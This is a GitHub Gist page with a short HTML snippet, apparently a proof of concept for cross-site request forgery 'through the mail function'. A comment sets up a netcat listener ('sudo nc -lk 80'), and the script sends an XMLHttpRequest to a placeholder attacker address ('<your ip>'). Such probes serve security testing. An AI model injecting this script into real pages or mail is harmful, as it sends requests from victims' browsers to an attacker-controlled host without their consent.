Created
February 2, 2013 00:50
-
-
Save DavidMah/4695325 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- CSRF through the mail function?--> | |
| <!-- sudo nc -lk 80--> | |
| <script> | |
| var oReq = new window.XMLHttpRequest; | |
| oReq.open("GET", "http://<your ip>", true); | |
| oReq.setRequestHeader("user", "bad"); | |
| oReq.send(); | |
| </script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment